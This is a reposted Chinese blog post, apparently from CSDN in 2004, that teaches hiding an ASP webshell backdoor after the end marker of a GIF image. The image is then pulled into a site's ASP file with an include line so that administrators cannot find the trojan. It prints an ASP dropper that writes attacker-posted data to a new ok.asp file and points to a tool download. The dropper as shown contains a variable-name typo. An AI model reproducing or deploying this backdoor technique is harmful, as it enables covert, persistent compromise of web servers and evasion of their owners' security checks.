把ASP脚本程序插入图片中

原创 2004年06月30日 16:33:00
把脚本程序插入图片中
[收藏,非原创]
现在从注入拿WEBSHELL看来成功率都比较高了。
拿到SHELL后,安装自己的脚本后门,常常被查杀。

脚本后门的发展史:
1。最开始就是直接放一个ASP文件上去。
2。把ASP文件加密才放上去。
3。把脚本插入到代码中去。(我经常用这种)

不过一样被查得出来,我前段时候手工检测一个站的脚本安全。
发现这个站被种了21个木马。
所以我就想到了,怎么样才能不被发现不能被查杀。

最后我研究了一下如果把脚本插入到图片中。
然后在ASP中调用图片中的脚本程序应该就可以了。

测试的时候通过了。
现在我把我的心德写一下。
让大家来分析一下。共同进步和完善这种方法。


在研究过程中我看了GIF图片的结构文档方面的书。
GIF图片都是以 00 3B 为结束的。
换句话说00 3B 后面的不会显示出来。
所以我们在00 3B后面插入代码就行了。
当然代码我们加密放到图片中去效果更好。

我写了一个程序来这么做。

这里要说一下,在图片中00 3B后面的是不会显示出来的。
但其中的代码已经运行了。图片也会正常显示出来。

测试:
在图片后面加入:<%=now%>
然后在一个ASP文件中加入:<!--include file="aaa.gif" --> 

然后你们下载这个图片,发现图片最后面变成了时间。很正常因为图片放到了ASP脚本中运行了其中的代码。

换句话来说,如果写的是一段生成文件的脚本。
那么我们提交特定的参数让图片中的代码去生成文件。
这样就实现了我们的后门。

1:这种方法要做的工作就是在目标站点中找一张GIF图片然后把代码插入到图片中,再上传到站点中去。这样作管理员很难找到木马在哪里。打死也想不到木马在图片中。
2:我们插入的代码只有一行就是那个include file .....
找个文件大点的ASP文件给插进去就行了。

然后我们在本地POST数据提交给ASP引用图片的URL这样就完成了工作。

我的插入图片的脚本:

<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% fdata = request("cyfddata") %>
<% if fdata<>"" then %>
<% syfdpath=server.mappath(Request.ServerVariables("SCRIPT_NAME"))&"/ok.asp"%>
<% Set objCountFile=objFSO.CreateTextFile(syfdapth,True) %>
<% objCountFile.Write fdata %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>

这段代码主要就是在当前目录下生成一个ok.asp文件。
文件内容是由我们提交的数据.用request("cyfddata")来获取的。

这段代码加密后插入到图片中去。
下面我把我程序的代码贴出来。(倒程序代码没有打包在里面。明天再贴上来)
现在给程序地址下载:
点这里下载测试程序。

本地自己构建一个提交表单向ASP文件提交(加入图片那个文件)
表单文本框输入内容名称是:cyfddata

后感:
我本人认为这种方法,管理员很难查到。这是我两天前想到的作出来了,
可能有些问题希望和大家一起讨论,必竞,为了追求技术就得研究技术。
共享知识,从而升华。
感觉去研究一些新东西,人活得更XS些。

asp插入图片的一种模式

 这个上传图片到数据库的模式,是弹出图片添加对话框,request只用于提交图片对象,不提交其他参数,省去分析提交的其他数据项,其他数据项通过session提交。  图片单独一个表,由id和内容组成,...
  • firstaking
  • firstaking
  • 2007年03月05日 16:12
  • 3147

讨论与研究把脚本程序插入图片中 (转载)

作者:臭要饭的! 来源:www.bugkidz.org  现在从注入拿WEBSHELL看来成功率都比较高了。拿到SHELL后,安装自己的脚本后门,常常被查杀。 脚本后门的发展史: 1。最开始就是直接放...
  • ycl111
  • ycl111
  • 2004年08月17日 09:18
  • 1228

如何在Altium Designer 软件PCB编辑器里插入图片或者公司LOGO

原文链接: 客户的问题之一。广大工程师在平时生活中会经常遇到。解决方法如下: 请参考文档 《 How to import a graphic onto the PCB overlay 》 ...
  • avrmcu1
  • avrmcu1
  • 2014年06月08日 23:17
  • 1245

java把图片写入mysql数据库的代码

 首先,建立数据库(主意image的数据类型): CREATE TABLE image (                           id int(5) NOT NULL,  ...
  • qypengs
  • qypengs
  • 2013年12月12日 10:27
  • 442

解决asp脚本超时的方法

 一种:你可以在IIS所在网站的属性里点击"主目录"然后"配置""选项"里ASP/cGI脚本超时 大小设置高一些   另一种方法更简单:直接在程序的头部加入  Server.Script...
  • dzswfl
  • dzswfl
  • 2008年04月13日 17:54
  • 368

Oracle如何插入图片数据?

1、创建表,注意:插入图片的列要定义成BLOB类型   create table image_lob(t_id varchar2(5) not null,t_image blob not null)...
  • avenccssddnn
  • avenccssddnn
  • 2013年02月07日 15:26
  • 5775

简单的脚本-ASP

        最近用ASP作了点小东西,感触良多。因为之前不管小东西还是大工程,都是用JSP,这回重新拾起高一时候玩过的ASP,仍然让人非常怀念。        ASP作为一种服务器脚本语言,提供了...
  • nicholas_dsj
  • nicholas_dsj
  • 2005年03月02日 23:17
  • 922

asp 数组 批量修改记录

asp 数组 批量修改记录id=Request("id")id=Split(id,",")hits=Request("hits")hits=Split(hits,",")regtime=Request...
  • yongfa365
  • yongfa365
  • 2007年04月19日 11:02
  • 873

使用Python向Excel中插入图片

使用Python向Excel文件中插入图片,这个功能之前学习xlwt的时候通过xlwt模块实现过。那时候是在公司做的尝试,印象中插入的图片最终缩小为了一个单元格,同时由于公司的加密系统如此实现了图片插...
  • grey_csdn
  • grey_csdn
  • 2017年05月21日 17:30
  • 4014

C语言VC++6.0环境中如何插入图片

getimage / putimage / loadimage / saveimage 这一组命令和 IMAGE 对象可以实现图像处理的相关功能,下面逐个介绍。 (有点类似 tc 中的 images...
  • sinat_16126695
  • sinat_16126695
  • 2015年01月05日 10:04
  • 2871
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:把ASP脚本程序插入图片中
举报原因:
原因补充:

(最多只允许输入30个字)